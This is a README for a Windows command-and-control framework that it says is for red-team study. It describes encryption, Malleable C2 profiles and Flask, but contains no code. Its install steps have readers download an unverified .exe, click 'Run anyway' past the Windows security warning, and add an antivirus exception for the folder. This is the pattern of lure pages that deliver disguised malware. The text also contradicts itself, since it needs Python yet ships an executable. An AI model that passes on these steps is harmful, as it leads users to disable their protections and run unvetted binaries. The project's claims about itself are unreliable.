This project provides a platform to study command and control systems. It assists red team leaders and security students in learning how modern networks handle traffic. The framework uses strong encryption standards like AES-256 and ECDH to secure data paths. It includes tools for certificate pinning and custom traffic profiles to simulate real-world activity.
You need a computer running Windows 10 or 11 to use this application. Ensure you have administrative rights on your machine to install necessary components. This framework requires Python, as it operates on a Flask backend.
Follow these steps to obtain the software:
- Visit this link to the release page.
- Look for the latest version listed under the Assets section.
- Download the executable file ending in .exe to your local hard drive.
- Locate the file in your downloads folder.
Before you run the software, check that your computer meets these needs:
- Windows 10 or higher.
- At least 4GB of RAM.
- A stable internet connection.
- Python 3.9 or newer must be installed on your system.
If you do not have Python, you can find the installer on the official Python website. During installation, ensure you tick the box that says "Add Python to PATH." This setting allows the framework to find the required tools automatically.
After you download the file, clear a space on your computer to host the framework. Follow these directions to prepare your environment:
- Create a new folder on your desktop and name it "c2-workspace."
- Move the downloaded executable file into this folder.
- Open the Command Prompt by typing "cmd" in your Windows search bar and pressing Enter.
- Type "cd Desktop\c2-workspace" and press Enter to move into your new folder.
- Enter the name of the executable file to start the process. For example, if the file is named "c2-tool.exe," type "c2-tool.exe" and press Enter.
The application window will open. If a Windows security prompt appears, click "More info" and then "Run anyway." This prompt occurs because the software is a specialized tool for security testing.
The framework relies on Malleable C2 profiles to manage traffic. You can modify these files to change how the framework communicates with your test systems.
- Open the "profiles" folder within your workspace.
- Select a profile file. You can open these with any text editor, such as Notepad.
- Change the settings inside the file to match your testing goals.
- Save the file and restart the application to apply the changes.
The system uses AES-256 for all field data. This ensures that your test traffic remains private. You do not need to configure encryption keys because the system generates unique security tokens for each session.
This framework enables several key functions for security research:
- ECDH Forward Secrecy: This keeps your traffic keys unique. Even if someone intercepts later data, they cannot unlock previous sessions.
- Certificate Pinning: The framework links traffic to a specific digital certificate. This prevents attackers from listening to your test communication.
- Flask Integration: The backend uses a lightweight web server. It handles incoming connections and manages the command loop.
- MITRE ATT&CK Mapping: The logs produced by the tool link activity to specific tactics. This helps you understand where the traffic fits in a standard security framework.
Does this framework damage my computer? No. It operates as a local application for educational use. It does not perform harmful actions on your system files.
Can I use this on a home network? Yes. You can test connections between two computers on the same local network. Ensure you have your firewall settings configured to allow traffic between the research tool and your test nodes.
Is it difficult to learn? The framework follows a logical path. You define your goal, set the profile, and watch the logs. Take time to read the output in the console window to see how the system processes data.
What if the connection fails? Check that your antivirus software is not blocking the application. Some security tools may flag the framework because it mimics network-based tools used by professionals. You might need to add an exception in your antivirus settings for the "c2-workspace" folder.
If the application hangs or closes unexpectedly, check the log file located in the "logs" sub-folder. This file contains text that describes the last action taken by the tool.
Common fixes include:
- Running the command prompt as an administrator.
- Verifying that Python is correctly installed by typing "python --version" in your terminal.
- Closing other network-intensive applications while running your tests.
This framework focuses on transparency. Every request sent by the system appears in the console window. If you see a warning in the console, read the text carefully to identify the network issue.
Use this framework only for authorized testing and educational purposes. Always seek permission before running security tests on any network. Engaging in unauthorized access is illegal and against these project rules. The intent here is to grow your skills in penetration testing and system defense.
Keep your copies of the framework updated. Check the GitHub page periodically for new releases. Updates often contain improvements to the encryption modules and stability fixes for the Flask server.
Always keep your test environment isolated from your personal data. Virtual machines serve as an excellent host for this framework. This keeps your main operating system clean and provides a safe sandbox for your experiments.